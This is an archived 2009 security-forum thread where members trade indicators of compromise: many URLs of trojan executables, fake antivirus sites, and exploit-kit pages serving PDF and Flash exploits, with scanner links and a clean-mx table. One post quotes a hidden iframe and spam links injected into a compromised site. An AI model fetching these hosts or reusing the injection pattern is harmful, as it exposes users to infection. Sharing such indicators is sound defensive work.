Wepawet (http://wepawet.iseclab.org/view.php?hash=a284924f3529a5d4d08b4e09a2453194&t=1246209781&type=js)
VirusTotal (http://www.virustotal.com/analisis/14d44d74e33ce1caeaf523632c346ec70b86767dec196b5d66ef87b77b08bde4-1246209825) - 2/41 (4.88%)
Title: Re: daily something......
Post by: cjeremy on June 28, 2009, 07:26:06 pm
Some more fun:

Code: [Select]
http://mm.cj-vv.cn:8888/mm/lm/new1.exe
http://mm.cj-vv.cn:8888/mm/lm/new2.exe
http://mm.cj-vv.cn:8888/mm/lm/new4.exe
http://mm.cj-vv.cn:8888/mm/lm/new6.exe
http://mm.cj-vv.cn:8888/mm/lm/new7.exe
http://mm.cj-vv.cn:8888/mm/lm/new8.exe
http://mm.cj-vv.cn:8888/mm/lm/new9.exe
http://mm.cj-vv.cn:8888/mm/lm/new10.exe
http://mm.cj-vv.cn:8888/mm/lm/new11.exe
http://mm.cj-vv.cn:8888/mm/lm/new12.exe
http://mm.cj-vv.cn:8888/mm/lm/new14.exe
http://mm.cj-vv.cn:8888/mm/lm/new15.exe
http://mm.cj-vv.cn:8888/mm/lm/new16.exe
http://mm.cj-vv.cn:8888/mm/lm/new17.exe
http://mm.cj-vv.cn:8888/mm/lm/new20.exe
http://mm.cj-vv.cn:8888/mm/lm/new21.exe
http://mm.cj-vv.cn:8888/mm/lm/new23.exe
http://mm.cj-vv.cn:8888/mm/lm/new24.exe
http://mm.cj-vv.cn:8888/mm/lm/new25.exe
http://mm.cj-vv.cn:8888/mm/lm/new26.exe
http://mm.cj-vv.cn:8888/mm/jx/new3.exe
http://mm.cj-vv.cn:8888/mm/jx/new4.exe
http://mm.cj-vv.cn:8888/mm/jx/new5.exe
http://mm.cj-vv.cn:8888/mm/jx/new6.exe
http://mm.cj-vv.cn:8888/mm/jx/new7.exe
http://mm.cj-vv.cn:8888/mm/jx/new8.exe
http://mm.cj-vv.cn:8888/mm/jx/new11.exe
http://mm.cj-vv.cn:8888/mm/jx/new12.exe
http://mm.cj-vv.cn:8888/mm/jx/new13.exe

Title: Re: daily something......
Post by: PaJamis on June 28, 2009, 09:54:04 pm
Quote
hxxp://dcvs.chc.edu.tw/classfix/default.asp (Mal/Iframe-I)
Title: Re: daily something......
Post by: MysteryFCM on June 28, 2009, 10:04:31 pm
Can you double check that one please? (hostname is failing to resolve from several locations over here)
Title: Re: daily something......
Post by: promised on June 29, 2009, 12:12:11 pm
Code: [Select]
liesbethmilan.be/1/captcha6.exe
liesbethmilan.be/1/ms.19.exe
Title: Re: daily something......
Post by: CM_MWR on June 29, 2009, 01:32:28 pm
FO
Title: Re: daily something......
Post by: philipp on June 29, 2009, 02:17:24 pm
Quote
Can you double check that one please? (hostname is failing to resolve from several locations over here)

Add a www to it or use google the domain name but there is more than just that one and cant see where any exploits popped out.   ???

After the closing html tag, i see the following:
Code: [Select]
<iframe src=http://www.3prince.com/kmdr/guest/images/_vti_cnf/tt/rp.htm width=30 height=0><div style="position: absolute; top: -999px;left: -999px;">
��������:
<a href="http://www.kryiyi.com">����һ��˽���l��վ</a>
<a href="http://www.61hj.com">Ӣ�ۺϓ�˽���l��վ</a>
<a href="http://www.reeltop.com">�ڿͽ��׾W</a>
<a href="http://www.941fc.com">����Ҫ�l??Ӱ�W</a>
<a href="http://www.ddoscc.cn">DDOS������,CC������˽�����������W�ɹ�����</a>
<a href="http://www.10004y.cn">�@���ӵ�˽��</a>
<a href="http://www.gfsj.org.cn">��������˽��</a>
<a href="http://www.3ky.org.cn">DDOS����?����DDOS���Rԭ����DDOS��������������ddos��������IP������</a>
<a href="http://1104f.cn">�@���ӵ�</a>
</div>

The iframed url returns http status code 404. I guess this is, where the exploits came from.

Most of the hosts resolve to 61.160.213.47, except of
w ww.941fc.com (NXDOMAIN)
w ww.ddoscc.cn (CNAME url.xundns.net -> 120.72.34.251)
w ww.10004y.cn (58.252.208.172)

w ww.ddoscc.cn returns:
Code: [Select]
HTTP/1.1 200 OK
Date: Mon, 29 Jun 2009 13:53:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 64
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCATCSDAA=DAOPAKFAOJEIFGHFMGKLFDLD; path=/
Cache-control: private


<meta http-equiv="refresh" content="0;url=http://ddoscc.cn">
ddoscc.cn again resolves to 61.160.213.47.

Trying to access these hosts on 61.160.213.47 always ends with the connection being interrupted/reset by the server.

w ww.10004y.cn does not contain anything malicious from a quick look.
Title: Re: daily something......
Post by: CkreM on June 30, 2009, 08:33:11 am
Pinch:
Code: [Select]
turbina.net/modules/w/load/exec.phphttp://www.virustotal.com/analisis/2cb4599b35deaacebdb1746918564ace0ebb0560e0fc7d7e9e14703bcd8590ea-1246346258

Emold:
Code: [Select]
nat77.biz/123.exehttp://www.virustotal.com/analisis/1b379fc266bf6ea59a945d77b54a4945c39012020739e90a621d8c21a6b4c62a-1246348304
Code: [Select]
iframecash.net/cache/bin/main.exe http://www.virustotal.com/analisis/9fcdcd460db594f5143457b2c52acbe509fb2abefb713e77f2d91e0184aa8888-1246348532

Fake AV:
Code: [Select]
pornotube915.com/scan
Trojans:
Code: [Select]
hzone66.cn/preloader_9.exehttp://www.virustotal.com/analisis/beb6f3ed69235697bcbc018198fb0228d683da9a9a2943984b3b3ba7431b328d-1246333025
Code: [Select]
niph-kosova.org/server3.exehttp://www.virustotal.com/analisis/a5fd40f7a8c7686f68ead6219ed842e129f6200c70cb4d5e61d1f8de35cf5d5c-1246346783
Code: [Select]
91.189.113.210/t.exehttp://www.virustotal.com/analisis/4452581e37cb7aedcfc68d937988785cd6d55a938f267b4beb87f1227cbb2db3-1246347754
Code: [Select]
79.174.64.36/ldr.exehttp://www.virustotal.com/analisis/05cdd3f1b6a8a8ba47391b5506ef1fbddd361f85bf24d54887c48eae2eb28cba-1246347842
Code: [Select]
casinousa.cn/lsass.exehttp://www.virustotal.com/analisis/324b639b727842e2b6854915ea7cc5018fba336386a9773720e4520abb701751-1246347934
Code: [Select]
winsofter.ru/out.exehttp://www.virustotal.com/analisis/14bd1b39cc6c4e23ce4a2ebc5e94676e850e0a91caf03af8d1ab3e6dcc9377c7-1246348063
Code: [Select]
missing-codecs.net/download/install_flash_player.exehttp://www.virustotal.com/analisis/c90303b43ad53fb5a223a72d13256bf9175cd63013053ce5f4de4de4a8eaef0c-1246350478

Exploits(wepawet and jsunpack fail on this)
Code: [Select]
svazkusavip.com/counter/index.phpPDF:
Code: [Select]
svazkusavip.com/counter/dummyButAre.pdf flash:
Code: [Select]
svazkusavip.com/counter/alwaysWord.swftrojan(downloader):
Code: [Select]
svazkusavip.com/counter/update.phphttp://www.virustotal.com/analisis/ddc27e9df2e8cdae43d75c5a1db53b1876a47c219000d5735460496b5298c1a8-1246347509

Exploits(wepawet fails on this one)
Code: [Select]
nah77.biz/myy/index.phphttp://jsunpack.jeek.org/dec/go?url=nah77.biz_myy_index.php
PDF:
Code: [Select]
nah77.biz/myy/pdf.phpTrojan(emold):
Code: [Select]
nah77.biz/myy/load.phphttp://www.virustotal.com/analisis/5b2536fccffdcbaf1d6538e01f34cde8ce104b1bced4cc42d1b64d554283698f-1246349005

Exploits(wepawet and jsunpack fail on this)
Code: [Select]
imagehut5.cn/index.phpPDF:
Code: [Select]
imagehut5.cn/pdf.php?id=2Trojan:
Code: [Select]
imagehut5.cn/load.php?id=2http://www.virustotal.com/analisis/301a24d763c36477cfc192c27b95c83a4801f75f98f0f7c2a5fe86973e9d4422-1246349595

Trojan downloaded by the above(change tcpip.sys)
Code: [Select]
85.114.141.207/EvID4226Patch.exehttp://www.virustotal.com/analisis/0d78fc5700892aee90cd409716b2f6e1a844da5e85e563eaac631a58d8d0edc2-1246349673
Title: Re: daily something......
Post by: promised on July 01, 2009, 04:25:05 am
Quote
2:http://mmdeai.3322.org/atievx.exe
2:http://milllk.com/wm/svchost.exe
2:http://havvvha.com/xiao/aa1.exe
2:http://havvvha.com/xiao/aa2.exe
2:http://havvvha.com/xiao/aa3.exe
2:http://havvvha.com/xiao/aa4.exe
1:http://havvvha.com/xiao/aa5.exe
2:http://havvvha.com/xiao/aa6.exe
2:http://havvvha.com/xiao/aa7.exe
2:http://havvvha.com/xiao/aa8.exe
2:http://havvvha.com/xiao/aa9.exe
2:http://havvvha.com/xiao/aa10.exe
2:http://havvvha.com/xiao/aa11.exe
2:http://havvvha.com/xiao/aa12.exe
2:http://havvvha.com/xiao/aa13.exe
2:http://havvvha.com/xiao/aa14.exe
2:http://havvvha.com/xiao/aa15.exe
2:http://havvvha.com/xiao/aa16.exe
2:http://havvvha.com/xiao/aa17.exe
2:http://havvvha.com/xiao/aa18.exe
2:http://havvvha.com/xiao/aa19.exe
2:http://havvvha.com/xiao/aa20.exe
2:http://havvvha.com/xiao/aa21.exe
2:http://havvvha.com/xiao/aa22.exe
2:http://havvvha.com/xiao/aa23.exe
2:http://havvvha.com/xiao/aa24.exe
2:http://havvvha.com/xiao/aa25.exe
2:http://havvvha.com/xiao/aa26.exe
2:http://havvvha.com/xiao/aa27.exe
2:http://havvvha.com/xiao/aa28.exe
2:http://havvvha.com/xiao/aa29.exe
2:http://havvvha.com/xiao/aa30.exe
2:http://havvvha.com/xiao/aa31.exe
2:http://havvvha.com/xiao/aa32.exe
2:http://havvvha.com/xiao/aa33.exe
2:http://havvvha.com/xiao/aa34.exe
2:http://havvvha.com/xiao/aa35.exe
2:http://havvvha.com/xiao/aa36.exe
2:http://havvvha.com/xiao/1.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 04:40:56 am
Code: [Select]
121.12.115.11:886/cao/aa1.exe
121.12.115.11:886/cao/aa2.exe
121.12.115.11:886/cao/aa3.exe
121.12.115.11:886/cao/aa4.exe
121.12.115.11:886/cao/aa5.exe
121.12.115.11:886/cao/aa6.exe
121.12.115.11:886/cao/aa7.exe
121.12.115.11:886/cao/aa8.exe
121.12.115.11:886/cao/aa9.exe
121.12.115.11:886/cao/aa10.exe
121.12.115.11:886/cao/aa11.exe
121.12.115.11:886/cao/aa12.exe
121.12.115.11:886/cao/aa13.exe
121.12.115.11:886/cao/aa14.exe
121.12.115.11:886/cao/aa15.exe
121.12.115.11:886/cao/aa16.exe
121.12.115.11:886/cao/aa17.exe
121.12.115.11:886/cao/aa18.exe
121.12.115.11:886/cao/aa19.exe
121.12.115.11:886/cao/aa20.exe
121.12.115.11:886/cao/aa21.exe
121.12.115.11:886/cao/aa23.exe
121.12.115.11:886/cao/aa25.exe
121.12.115.11:886/cao/aa26.exe
121.12.115.11:886/cao/aa27.exe
121.12.115.11:886/cao/aa28.exe
121.12.115.11:886/cao/ms.exe
x9s7b.cn:8808/a/lzz.css
x9s7b.cn:8808/a/ms.css
x9s7b.cn:8808/a/real11.css
Title: Re: daily something......
Post by: CkreM on July 01, 2009, 06:15:23 am
Fake AV:
Code: [Select]
pornotube914.com/scan
atoylev.cn/?wm=70321
Title: Re: daily something......
Post by: promised on July 01, 2009, 07:02:53 am
Code: [Select]
mvt.c4.fr/a.css
mavr-best.com/ldr/bot.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 09:15:04 am
Quote
pornotube915.com/codec/.exe
74.52.164.210/pk/bb090621.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 09:27:46 am
Code: [Select]
megavipsite.cn/av/iframe/socks.exe
l3world.ru/l2.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 01:45:14 pm
Quote
freett.com/950065/guama.exe
freett.com/950065/cq.exe
freett.com/950065/arp.exe
freett.com/950065/qn3.exe
freett.com/950065/pt.exe
freett.com/950065/hb1.exe
xoomer.alice.it/email02/bom.jpg
hxxp://www.fanv.cn/d.exe
hxxp://www.fei4.cn/aa.exe
Title: Re: daily something......
Post by: promised on July 01, 2009, 02:34:15 pm
Quote
hxxp://x.b76.net/winres.exe
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=1&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://bewfsnfwka.net/uniq.php?id=1883789557&p=0
hxxp://bgukeumzwz.net/ccsuper1.php
hxxp://bgukeumzwz.net/ccsuper0.php
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=
hxxp://click0617.winrar2009.cn:88/files/click.jpg
hxxp://bgukeumzwz.net/ccsuper2.php
hxxp://www.51.la/?002941498
hxxp://heyjoy.cn/612.exe
hxxp://img.users.51.la/2941498.asp
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=2&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://www.51.la/?2941498
hxxp://web2.51.la/go.asp?svid=40&id=2941498&tpages=3&ttimes=1&tzone=8&tcolor=32&sSize=1280,1024&referrer=&vpage=hxxp%3A//stat.winrar2009.cn%3A88/ic.htm
hxxp://ppc0617.winrar2009.cn:88/d.txt
hxxp://bgukeumzwz.net/ccsuper3.php
Title: Re: daily something......
Post by: promised on July 02, 2009, 03:21:11 pm
Quote
hxxp://www.area03601.com/components/k.exe
hxxp://www.area03601.com/components/w.exe
iarc.er-robotics.org/images/wingb.dll
iarc.er-robotics.org/images/gbtext.dll
hxxp://www.toncom.net/images/indexn.gif
lawd.poloi999.cn/down/dnf9m.exe
lawd.poloi999.cn/down/tl9m.exe
lawd.poloi999.cn/down/mhxu9m.exe
lawd.poloi999.cn/down/mhxu9m1.exe
lawd.poloi999.cn/down/qq3g9m.exe
lawd.poloi999.cn/down/qq3g9m1.exe
lawd.poloi999.cn/down/wmgj9m.exe
lawd.poloi999.cn/down/zx9m.exe
lawd.poloi999.cn/down/wd9m.exe
lawd.poloi999.cn/down/dh29m.exe
lawd.poloi999.cn/down/qqhx9m.exe
lawd.poloi999.cn/down/mu9m.exe
lawd.poloi999.cn/down/zt9m.exe
lawd.poloi999.cn/down/cqsj9m.exe
lawd.poloi999.cn/down/dj9m.exe
lawd.poloi999.cn/down/wl9m.exe
lawd.poloi999.cn/down/jxsj9m.exe
lawd.poloi999.cn/down/xc9m.exe
lawd.poloi999.cn/down/tx29m.exe
lawd.poloi999.cn/down/zu9m.exe
lawd.poloi999.cn/down/dh39m.exe
lawd.poloi999.cn/down/hx29m.exe
lawd.poloi999.cn/down/dhwd9m.exe
lawd.poloi999.cn/down/zzh9m.exe
lawd.poloi999.cn/down/jr9m.exe
lawd.poloi999.cn/down/cp9m.exe
lawd.poloi999.cn/down/kx9m.exe
lawd.poloi999.cn/down/cqwd9m.exe
lawd.poloi999.cn/down/rxjh9m.exe
lawd.poloi999.cn/down/CJSH9M.exe
lawd.poloi999.cn/down/WZSJ9M.exe
lawd.poloi999.cn/down/aion9m.exe
lawd.poloi999.cn/down/qqmo.exe
lawd.poloi999.cn/down/qqma1.exe
ssl1899.websiteseguro.com/box10/errors.exe
ssl1899.websiteseguro.com/box10/3.exe
up.cj-vv.cn:889/up1/up.exe
Title: Re: daily something......
Post by: sparsha on July 03, 2009, 02:14:20 pm
Code: [Select]
http://securitybestonline.com/hitin.php?land=20&affid=21300
http://netsecurityweb.com/hitin.php?land=20&affid=20100
http://goscanany.com/?uid=13005
http://av-scan-64.com/?id=48040

http://therealsecurityshields.com/page.php?id=73
http://6-tube-world.com/xplaymovie.php?id=40012

http://downloadfixandlove1.com/file.exe
http://downloadfixandlove.com/pcdef.exe

http://video-tube.cn/tds3/in.cgi?5
http://green-tube-site.com/xplaymovie.php?id=45095

http://exedoc.com/TubeViewer.ver.6.48022.exe
http://exedoc.com/av-scanner.48040.exe

http://theexe.com/streamviewer.45059.exe
Title: Re: daily something......
Post by: sparsha on July 11, 2009, 11:21:01 am
"PC Security 2009"

braviax/brastk advertised rogue
Code: [Select]
http://pcsecurity2009.com/
Kuxx.info
http://pcsecassal.com/1/installer/Installer2.exe
http://pcsecureredirect2.com/?wmid=1025&d=1&it=2&s=1
pcsecurity-2009.com
Title: Re: daily something......
Post by: sparsha on July 13, 2009, 10:36:56 am
Rogue related sites:
Code: [Select]
http://Anti-virus-best.com
http://anti-virus-best.info/install.php
http://download.anti-virus-best.info/dl/PreInstaller.exe

http://Sprut-cluster.info
http://genantivirus.com/download/GeneralAntivirus.exe
http://check-for-threats.us/5/11/0/wsetup.exe

http://securitytrial.com/hitin.php?land=30&affid=21700
http://securitytrial.com/download.php?affid=21700
Title: Re: daily something......
Post by: sparsha on July 13, 2009, 10:56:03 am
Fake porn and associated trojan distributing sites

Code: [Select]
http://yourtubetop.com/xplaymovie.php?id=45095
http://exe-paste.com/onlinemovies.45095.exe

http://testtubefilms.com/xfreeporn.php?id=48022
http://exe-porto.com/onlinemovies.1.48022.exe
Title: Re: daily something......
Post by: CkreM on July 13, 2009, 11:19:48 am
Long time no post....


Fake AV:
Code: [Select]
axevoq.cn
scanmeta6.info

Fake AV downloader:
Code: [Select]
x-daily.com/st/img/z/http://www.virustotal.com/analisis/ec8f810f10303fd92dbd71cad82e4f88b4eeb1a106e0c7f19deb6783d85cff8a-1247469472

Trojans:
Code: [Select]
krisnet.cn/test/mss8.exehttp://www.virustotal.com/analisis/514a5b90e717557b021dc3db33db42306dc98d40244fc5d6ae8bbe35bf85d3f9-1247471742
Code: [Select]
analitics.in/load.php?id=5 http://www.virustotal.com/analisis/638fe7388525c7921a8a25dcdbb724cd2e30191ca61146640abd7bedd0ee37c5-1247474875
Code: [Select]
goodtraff.ru/exe.phphttp://www.virustotal.com/analisis/8fef564cab88a2e50d46ba0ecf29962dc8ccb1a47f7b0aabb8d4b0202e2a6412-1247301460
Code: [Select]
onuka.cn/dll/mal.txthttp://www.virustotal.com/analisis/d979c2f805ce2e01d21e49aad39e3ff0f2aa7e98c86b0e5671a7c4868bfa5640-1247482711

Trojan Emold:
Code: [Select]
puppsik.biz/bin/mainokK.exe http://www.virustotal.com/analisis/1fe41137eacfc78a731628bfb77cb9e32453905fbf19e8bd89cbdbe713d37b4c-1247475919

PDF exploit:
Code: [Select]
www.tech2tech.cn/pack/pdf.phpTrojan:
Code: [Select]
www.tech2tech.cn/pack/load.phpwww.virustotal.com/analisis/5e93068f29e3de9cc46273a20daebecb3e0f837b7ad38454032ff040af1502fb-1247175304


PDF Exploit:
Code: [Select]
updatedate.cn/img/pfqf2.php
updatedate.cn/img/pfqf.php
Trojan:
Code: [Select]
updatedate.cn/img/uet.php http://www.virustotal.com/analisis/6779fd91fd3f3a9aa17e1198af5f599d50bc8e17f0c0abd0232dd67ab02cf1f6-1247467328

Exploits:
Code: [Select]
bezopbizn.ru/up/index.phphttp://wepawet.iseclab.org/view.php?hash=e49b5e3e7e53eb102b9b915e12a455cf&t=1247471805&type=js
PDF
Code: [Select]
bezopbizn.ru/up/pdf.phpTrojan Emold:
Code: [Select]
bezopbizn.ru/up/getexe.phphttp://www.virustotal.com/analisis/357a0ba3ef66843d5cb8ff4e6098aa57f380888d710827b6d99a5d30fe222cbc-1247472448

contain iframe to Exploits:
Code: [Select]
sulidev.com/ie.phphttp://wepawet.iseclab.org/view.php?hash=fa8b3589b1dbf71ff281b646934c86aa&t=1247478460&type=js
Exploits:
Code: [Select]
usrvnu.ru/shot.php?aff=1http://wepawet.iseclab.org/view.php?hash=39123a5ebfa961048ee1c9619780defe&t=1247478902&type=js
Code: [Select]
usrvnu.ru/ds94685.htmhttp://wepawet.iseclab.org/view.php?hash=aac8d2b75e2eeabfc06fc7f2e3107584&t=1247478766&type=js
Code: [Select]
usrvnu.ru/ds94685.jpghttp://wepawet.iseclab.org/view.php?hash=791a64ca4f4d3dc353b02935ec3aaf5c&t=1247478925&type=js
PDF:
Code: [Select]
usrvnu.ru/pdf.php?id=94685
Exploits:
Code: [Select]
ferarilatka.cn/exp/index.phphttp://wepawet.iseclab.org/view.php?hash=8030471c9b20f1a008be9c8ee9218bca&t=1247479213&type=js
PDF:
Code: [Select]
ferarilatka.cn/exp/koxyebuth.pdfFlash:
Code: [Select]
ferarilatka.cn/exp/xyachuch.swfTrojan Oficla:
Code: [Select]
ferarilatka.cn/exp/update.phphttp://www.virustotal.com/analisis/dc118a1cf32b0d2a69d1629318f7072d0fb4d915c50372b534c892223d5fde45-1247479392

Exploits:
Code: [Select]
wesssrett.cn/catalog/index.phpPDF:
Code: [Select]
wesssrett.cn/catalog/theirTextLayout.pdfTrojan oficla:
Code: [Select]
wesssrett.cn/catalog/update.php http://www.virustotal.com/analisis/dc118a1cf32b0d2a69d1629318f7072d0fb4d915c50372b534c892223d5fde45-1247152324

Exploits:
Code: [Select]
thetests.net/yes/index.phphttp://wepawet.iseclab.org/view.php?hash=c8e7a115937fdb157ccc26bca75fab21&t=1247481445&type=js
PDF:
Code: [Select]
www.thetests.net/yes/include/spl.php?stat=Windows XP|Internet Explorer 7.0|US|Internet ExplorerTrojan:
Code: [Select]
www.thetests.net/yes/load.php?s=6http://www.virustotal.com/analisis/80f0b51b1153675c5a111db83d1a409c3730a67f73273368197a35440fdfc7f6-1247247444

Exploits:
Code: [Select]
webalfa.cn/pab/index.phphttp://wepawet.iseclab.org/view.php?hash=fce245c8bb2cd14ff823671322a196cf&t=1247481888&type=js
PDF:
Code: [Select]
webalfa.cn/pab/include/spl.php?stat=Windows XP|Internet Explorer 7.0|US|128.111.48.95Trojan:
Code: [Select]
webalfa.cn/pab/load.phphttp://www.virustotal.com/analisis/dbb5472ac5c82fc089c2a48f9514a6273548ec36c41db49e5bb9e31a7b4c4db7-1247482366
Title: Re: daily something......
Post by: PaJamis on July 14, 2009, 01:21:39 am
Quote
hxxp://hotexefiles.com/onlinemovies.45080.exe
http://www.virustotal.com/analisis/f1a9d76bfa53a8ebb94c3c9a6ce4dd0c2ce1766f64be2d353c1d2db8b041f45c-1247534725
Title: Re: daily something......
Post by: sparsha on July 14, 2009, 02:35:16 pm
System Security rogue related sites
Code: [Select]
http://sucupdate.com/download.php?affid=00000
http://zocleaner.com/download.php?affid=00000

Trojan
Code: [Select]
exenetsfiles.com/onlinemovies.1.48040.exe
http://sexfreetube.net/movies/download/free_stream_video.exe
http://sexfreetube.net/movies/download/codec.exe

Title: Re: daily something......
Post by: cleanmx on July 14, 2009, 03:05:15 pm
Hi Folks another bunch of malware in the wild:
see also http://support.clean-mx.de/clean-mx/viruses?response=alive (http://support.clean-mx.de/clean-mx/viruses?response=alive)

-- gerhard
Code: [Select]
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| timestamp           | scanner    | virusname                                                 | review          | email                        | country | source | netname               | url                                                                                                                                                                                              |
+---------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 2008-08-18 21:20:02 | trendmicro | TROJ_XCHANGER.B                                           | 77.235.49.27    | phone: +302106560551         | NL      | RIPE   | GR-EUROVPS-20070517   | http://www.operasofia.com/install.exe                                                                                                                                                            |
| 2009-05-19 03:55:04 | avira      | TR/Dropper.Gen                                            | 201.12.119.15   | sistemas@intelignet.com.br   | BR      | LACNIC | 002.421.421/0001-11   | http://201.12.119.15/Cadastramento.exe                                                                                                                                                           |
| 2009-05-25 17:55:09 | avira      | DR/FakeAV.MX                                              | 221.5.74.38     | abuse@cnc-noc.net            | CN      | APNIC  | CNCGROUP-GD           | http://dl.guarddog2009.com/av.exe                                                                                                                                                                |
| 2009-06-23 23:55:13 | avira      | TR/Spy.Banker.ABPR                                        | 60.208.77.210   | abuse@cnc-noc.net            | CN      | APNIC  | CNCGROUP-SD           | http://60.208.77.210/MOD/MODULO-ITAU.exe                                                                                                                                                         |
| 2009-06-24 02:55:18 | avira      | TR/ATRAPS.Gen                                             | 208.196.247.108 | NETQ@aitcom.net              | US      | ARIN   | UUNET1996B            | http://208.196.247.108/awstats/classes/src/Telegrama-7614.scr                                                                                                                                    |
| 2009-06-30 14:01:49 | avira      | TR/Dldr.Fake.CGAV                                         | 76.76.103.164   | abuse@existhosting.com       | CA      | ARIN   | INTERWEB-MEDIA        | http://guardlab2009.biz//InstallerWF.exe                                                                                                                                                         |
| 2009-06-30 14:01:49 | avira      | TR/Dldr.Fake.CGAV                                         | 76.76.103.164   | abuse@existhosting.com       | CA      | ARIN   | INTERWEB-MEDIA        | http://guardlab2009.net//InstallerWF.exe                                                                                                                                                         |
| 2009-06-30 14:01:49 | avira      | TR/Crypt.ZPACK.Gen                                        | 65.61.216.163   | abuse@in2net.com             | CA      | ARIN   | IN2NETWORK            | http://healthylifehypnotherapy.com/flashcodecinstall_13_31.exe                                                                                                                                   |
| 2009-06-30 14:01:49 | avira      | ADSPY/DiscoveryLive.A                                     | 64.22.66.202    | abuse@gnax.net               | US      | ARIN   | GNAXNET               | http://mdl.stuffplug.com/MDL_1.3.0300.exe                                                                                                                                                        |
| 2009-06-30 14:01:49 | undef      | unknown_SetupPoker_46c620.exe                             | 69.90.74.226    | abuse@peer1.net              | US      | ARIN   | PEER1-BLK-08          | http://banner.titanpoker.com/cgi-bin/SetupPoker.exe                                                                                                                                              |
| 2009-06-30 14:01:49 | avira      | TR/Agent.82944                                            | 67.210.127.56   | hostmaster@lunarpages.com    | US      | ARIN   | ADD2NET-DOT-COM       | http://boutique-world.com/watch.exe                                                                                                                                                              |
| 2009-06-30 14:01:49 | undef      | unknown_$INSTDIR/DivxPlayer.exe                           | 207.218.211.242 | abuse@ev1servers.net         | US      | ARIN   | EVRY-BLK-1            | http://divx-player.ivefound.com/./download/DivxPlayerSetup.exe                                                                                                                                   |
| 2009-06-30 14:01:49 | undef      | unknown_$SHELc[17]/360safe/Shield/Install/360sandbox.exe | 60.170.241.20   | wanglinlin2@anhuitelecom.com | CN      | APNIC  | CHINANET-AH           | http://down.360safe.com/se/360se_1.3.exe                                                                                                                                                         |
| 2009-06-30 14:01:49 | undef      | unknown_exe                                               | 221.203.179.20  | abuse@online.ln.cn           | CN      | APNIC  | CNCGROUP-LN           | http://down.sandai.net/Thunder5.8.7.625.exe                                                                                                                                                      |
| 2009-06-30 14:01:50 | undef      | unknown_exe                                               | 208.113.150.124 | abuse@dreamhost.com          | US      | ARIN   | DREAMHOST-BLK6        | http://palsol.com/downloads/spyrem_setup.exe                                                                                                                                                     |
| 2009-06-30 14:01:50 | undef      | unknown_exe                                               | 64.208.226.93   | abuse@gblx.net               | US      | ARIN   | GBLX-11A              | http://privacy-care.com/bin/SpywareExpertInstall.exe                                                                                                                                             |
| 2009-06-30 14:01:50 | avira      | TR/Dldr.Agent.yhp                                         | 217.76.156.92   | abuse@tpnet.pl               | PL      | RIPE   | NET-PIENSASOLUTIONS-2 | http://sapacontenedores.com/get_flash_update.exe                                                                                                                                                 |
| 2009-06-30 14:01:50 | undef      | unknown_exe                                               | 70.38.54.20     | abuse@noc.privatedns.com     | CA      | ARIN   | IWEB-BLK-05           | http://spyremover.com/downloads/SpyRemoverSetup.exe                                                                                                                                              |
| 2009-06-30 14:01:50 | avira      | TR/Crypt.ZPACK.Gen                                        | 62.149.174.149  | hostmaster@technorail.com    | IT      | RIPE   | TECHNORAIL-NET        | http://www.artistinove.it/shok_video.exe                                                                                                                                                         |
| 2009-06-30 14:01:50 | avira      | BDS/Hupigon.Gen                                           | 125.65.112.10   | anti-spam@ns.chinanet.cn.net | CN      | APNIC  | CHINANET-SC           | http://www.js0575.com/ac/2.exe                                                                                                                                                                   |
| 2009-06-30 14:01:50 | undef      | unknown_exe                                               | 75.125.152.58   | abuse@theplanet.com          | US      | ARIN   | EVRY-BLK-17           | http://www.macrovirus.com/setup.exe                                                                                                                                                              |
| 2009-06-30 14:01:50 | avira      | TR/Crypt.ZPACK.Gen                                        | 61.139.126.14   | anti-spam@ns.chinanet.cn.net | CN      | APNIC  | CHINANET-SC           | http://www.nicovedeo.com/watch/ma.exe                                                                                                                                                            |
| 2009-06-30 14:01:50 | avira      | DR/KeyLog.32                                              | 208.113.150.124 | abuse@dreamhost.com          | US      | ARIN   | DREAMHOST-BLK6        | http://www.palsol.com/downloads/v3/Setup_CSS_Shareware.exe                                                                                                                                       |
| 2009-06-30 14:01:50 | avira      | DR/KeyLog.32.1                                            | 208.113.150.124 | abuse@dreamhost.com          | US      | ARIN   | DREAMHOST-BLK6        | http://www.palsol.com/downloads/v3/Setup_PCS_Shareware.exe                                                                                                                                       |
| 2009-06-30 14:01:50 | avira      | ADSPY/Softomat.E.10                                       | 64.111.196.124  | abuse@isprime.com            | US      | ARIN   | ISPRIME-ARIN-2        | http://www.peakclick.com/toolbar/1/toolbar.exe                                                                                                                                                   |
| 2009-06-30 14:01:50 | undef      | unknown_exe                                               | 64.208.226.93   | abuse@gblx.net               | US      | ARIN   | GBLX-11A              | http://www.privacy-care.com/bin/SpywareExpertInstall.exe                                                                                                                                         |
| 2009-07-01 17:53:46 | undef      | unknown_exe                                               | 74.125.39.137   | arin-contact@google.com      | US      | ARIN   | GOOGLE                | http://kodenadaqequnul2.googlegroups.com/web/a289743kjhfkjhkj3hkj.swf?gda=q-N2NUsAAACuGiGjtYknYpnLJ9JOD6VhQaFUmokO1f_8pAMqUmUp_d812b7JYV_uUBJlRIiigwRbYpQIvmf_l9f_E8k9I2rxBkXa90K8pT5MNmkW1w_4BQ |
| 2009-07-06 19:04:09 | undef      | unknown_exe                                               | 82.103.141.146  | abuse@easyspeedy.com         | DK      | RIPE   | EASYSPEEDY-NETWORK    | http://www.ymmoo.net/setup_ymmoo.exe                                                                                                                                                             |
